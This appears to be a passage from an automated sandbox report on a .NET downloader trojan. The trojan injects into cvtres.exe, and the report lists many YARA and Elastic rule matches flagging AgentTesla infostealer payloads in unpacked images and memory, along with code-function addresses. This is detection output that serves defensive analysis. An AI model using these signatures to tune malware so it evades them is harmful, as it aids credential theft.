                Source: 3.2.cvtres.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bEEE02A64u002dA051u002d4832u002d8500u002dBCB6E03153A3u007d/u003277DE882u002dD82Fu002d4CFAu002d82FDu002d8DA69792B4E8.csLarge array initialization: .cctor: array initializer size 12005
                Source: 3.0.cvtres.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bEEE02A64u002dA051u002d4832u002d8500u002dBCB6E03153A3u007d/u003277DE882u002dD82Fu002d4CFAu002d82FDu002d8DA69792B4E8.csLarge array initialization: .cctor: array initializer size 12005
                Source: 3.0.cvtres.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bEEE02A64u002dA051u002d4832u002d8500u002dBCB6E03153A3u007d/u003277DE882u002dD82Fu002d4CFAu002d82FDu002d8DA69792B4E8.csLarge array initialization: .cctor: array initializer size 12005
                Source: 3.0.cvtres.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bEEE02A64u002dA051u002d4832u002d8500u002dBCB6E03153A3u007d/u003277DE882u002dD82Fu002d4CFAu002d82FDu002d8DA69792B4E8.csLarge array initialization: .cctor: array initializer size 12005
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe PID: 2280, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC190 KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC1EF KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC1EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC1B1 KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC1B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC99F DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC99F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC955 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC955
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC90E DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC90E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC8C7 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC8C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC880 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC880
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC839 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC839
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC3F6 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC3F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC3AF DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC3AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC352 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC30B DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC2C4 KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC2C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC27D KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC27D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC236 KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC236
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC5CC DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC5CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC58E DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC58E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC547 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC509 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC509
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC4C2 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC4C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC47B DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC47B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC434 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC434
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC7F2 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC7F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC7AB DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC7AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC764 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC764
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC71D DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC71D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC6D6 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC6D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC68F DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC68F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC190 KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC648 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC60A DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,3_2_09ECC60A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A5A4810_2_00A5A481
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A58C000_2_00A58C00
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A51C500_2_00A51C50
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A535A80_2_00A535A8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A59D1A0_2_00A59D1A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A5AD610_2_00A5AD61
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A526300_2_00A52630
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A587D80_2_00A587D8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A597200_2_00A59720
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A513400_2_00A51340
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A534A10_2_00A534A1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A544800_2_00A54480
